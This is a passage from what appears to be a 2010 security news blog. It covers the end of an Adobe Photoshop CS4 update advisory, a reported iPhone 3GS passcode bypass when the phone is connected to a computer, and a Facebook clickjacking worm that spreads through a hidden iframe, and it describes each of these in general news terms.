Adobe recommends Photoshop CS4 customers update to Photoshop CS4 11.0.2, which resolves these issues. Adobe also encourages all customers to follow security best practices by exercising caution before opening any unknown file or files from unknown sources, regardless of the application used to open the file.

These issues do not affect Photoshop CS5.

To verify the version of Adobe Photoshop CS4 currently installed, choose Help > About Adobe Photoshop CS4 from the Adobe Photoshop menu bar. To check for updates, choose Help > Updates from the Adobe Photoshop menu bar.

Photoshop CS4 customers can find the Photoshop CS4 11.0.2 update for Windows or Macintosh here:

Critical iPhone security issue leaves your contents exposed

Most iPhone users are confident that using a passcode to secure their devices means that even if they lost them or they get stolen, their data will be protected from prying eyes.

Unfortunately for them, Bernd Marienfeld, an information security professional, discovered last week that the passcode protection can be bypassed simply by connecting the iPhone 3GS in question to a computer running Ubuntu 10.04.

According to him, the iPhone can be tricked into allowing access to photos, videos, music, voice recordings, the Google Safe Browsing database, game content and more by switching it off, connecting it to the computer, then switching it back on.

He claims to have obtained read-and-write access on four different non-jailbroken, passcode-protected iPhone 3GS units running different iPhone OS versions. The vulnerability, he says, is definitely not an Ubuntu vulnerability but a flaw in the way the iPhone implements authentication when connected to a computer.

Apple has been notified of the flaw, and they managed to reproduce it, but have yet to push out a fix or to say when it will be made available.

In the meantime, heise Security has succeeded in using the same flaw to gain full access to an iPhone - even to create a backup of its contents - using iTunes on Windows. According to Marienfeld, they could read notes, SMS messages and passwords in plaintext.

Since the iPhone has become the device of choice for many an enterprise user, Apple will definitely have to take a good look into the security settings and features of one of its most popular products if it wants to keep its market share - or increase it.

01 June 2010

Viral clickjacking Facebook worm spreads

Yet another clickjacking attack has recently been aimed at Facebook users.

If you see messages such as "LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE.", "This man takes a picture of himself EVERYDAY for 8 YEARS!!", "The Prom Dress That Got This Girl Suspended From School.", and "This Girl Has An Interesting Way Of Eating A Banana, Check It Out!" on a friend's Facebook page, you can be pretty sure they have clicked on the same message that came up on their friend's page.

Clicking on any of those links sends the user to a web page that sports - black on white - only one line of text: "Click here to continue".

A click on any spot of the page (text or not) publishes the message on your own Facebook page. The culprit is a hidden iframe, which actually makes you "like" a page by the same name as the message.

A curious friend clicks on the link, and the clickjacking worm starts a new cycle.

Graham Cluley recommends that users who have fallen for the scheme review their news feed and delete the offending messages, then remove the page(s) from their "Likes and interests" section.